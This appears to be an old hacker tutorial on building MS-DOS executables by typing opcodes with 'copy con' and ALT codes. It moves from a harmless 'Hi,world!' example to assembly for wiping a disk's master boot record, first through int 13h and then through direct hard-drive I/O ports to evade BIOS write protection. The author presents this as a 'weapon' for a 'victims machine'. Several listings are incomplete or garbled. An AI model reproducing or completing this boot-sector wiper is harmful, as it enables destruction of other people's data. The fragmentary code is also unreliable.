Programming in extreme conditions
by Alexey Kalmykov (aka B52)
What is 'extreme conditions' ? When you are sitting in front of a
computer with only MS-DOS installed without any compilers, hex editors, shells,
debuggers and you need to recover lost data, delete virus, or write a new one.
This is an extreme conditions. Most of programmers won't be able to do anything,
most of administrators think that this computer is 100% secured.
But this won't stop the real hacker ...
I have chosen pure MS-DOS as the operation system to program for because in some version of Windows there are many things that will easier this task (e.g. in Windows 98 there is-built in browser with VBScript and Java Script interpretators so you can easy write a hex-editor and more).
This article will be interesting as for the beginners and experienced hackers. Also I recommend it to programmers, administrators, and anybody who wants to feel the hacking spirit, which now is disappearing with the previous hackers generation.
To read and understand this you will need this minimum: the knowledge of Assembler, experience working with MS-DOS. Also you will need the list of x86 instructions opcodes (you can find it here on Elf Qrin Hacking Labs), ASCII table, and lot of free time.
First of all, we need some kind of text editor. But the administrator removed EVERYTHING that could help us. There is only one thing that differs a good hacker from any other hacker - It's the deep knowledge of everything he works with. If works with DOS he knows everything about it. There is undocumented functions that opens a tiny text editor, but that's enough. Enter this DOS command:
C:\copy con test.com
(con stands for "console")
You will run the text editor. This is our instrument. But we still don't know how to write binaries.
If you will look to official MS-DOS manual, you'll find the answer. Using ALT key and the numeric keyboard you can create binaries.
First of all check if the NUMlock on. Now press ALT, type 195, now release ALT. To save file and exit press CTRL-Z and hit enter. Now run it.
It doesn't do anything but it doesn't halt the system. If you disassemble it you will find that test.com consists only of one command RETN. As you already guessed opcode of RETN (195 == 0xC3), and in decimal it is 195.
Well, It was easy. Now try to enter this:
ALT-180 ALT-09 ALT-186 ALT-09 ALT-01 ALT-205 ! ALT-195 ALT 32 Hi,world!$
Than press CTRL-Z and hit enter. It is clear that this program that prints "Hi,world!". Let's disassemble it:
49E0:0100 B4 09 mov ah,9
49E0:0102 BA 0109 mov dx,offset data_1 ;
49E0:0105 CD 21 int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
49E0:0107 C3 retn
49E0:0108 20 db 20h
49E0:0109 48 69 20 21 21 21 data_1 db 'Hi,world!$; xref 49E0:0102
I hope you know about the reversed order in machine word (Little/Big Endian: ALT-09 ALT-01 = 109). Also, in order to show the beauty of this method, I used symbol '!' == 0x21 to call interrupt 0x21. So knowing ASCII codes can easier your life. But why we need this symbol (20h == ALT-32 == " ") at 49E0:0108 ?
This is the main problem of this method. Using ALT and numeric keyboard we cannot enter some symbols. Here is a list of them:
You will need to avoid this symbols. If you look at the code, you'll see that the real offset is 0x108. After adding a symbol the offset became 0x109. Actually there is more elegant way to do it:
These two variants are equal (dec dx == 1 byte) and you chose
what suits you best.
One of the main problem is finding offset of variables and labels. You can write program on the paper, giving to variables symbolic names, and then the program will be ready it will be easy to find necessary offsets and address.
Another possibility is declaring all variables before their usage:
jmp sort $+20
mov dx,0x100+2+2; 0x100 - the base adress,2 - lengh of
; mov ah,9, 2 - lengh of jmp
jmp short $+20 - reserves 20 bytes for the string. This method could be also used for labels.
I think you are tired of these theoretical program and feel ready to see this method in work ? As illustration we will try to create a program that erases the boot sector. Attention! The usage of this program in order to destroy information is a crime. You should use it only for experimental purpose.
First of all, let's write it on assembler:
B80103 mov ax,00301
B90100 mov cx,00001
BA8000 mov dx,00080
CD13 int 013
As you see we have one #0, one #3 and one #19. Let's modify the program to avoid them:
call dword ptr [bx]
It's quite a hard example. The assembler programming and interrupts are not really the subject of this article. I can only forward you to the other references that you can easily find in the Internet.
That's all: enter this in victims machine and you have powerful weapon. I recommend to use it very carefully.
Fortunately (or unfortunately, depends on readers orientation), in BIOS there is a boot write protection (sometimes it's called "Virus warning").It will block any efforts to modify the main boot sector. That's more, there can be installed special software. For example, running this program under Windows 98 operation system will take no effect. But we still can work with hard drive I/O ports on a low-level.
Here is an example of program that will erase main boot sector, through hard drive I/O ports:
mov dx, 1F2h
mov al, 10100000b
lea si, Buffer
mov dx, 1F0h
mov cx, 513
I don't know any popular protection that can track and block that program. However, that doesn't refer to Windows NT, this OS won't allow any program without necessary privileges to work with ports, even more it will close the application's window!
Preparing this example for entering it using ALT and optimizing It's size I will leave as an exercise to the readers.
It's not easy. All this requires a lot of experience and talent but gives you incredible power on machine. And i hope you won't be using this power for destruction also I hope this article will be a step "back to the real spirit of hacking".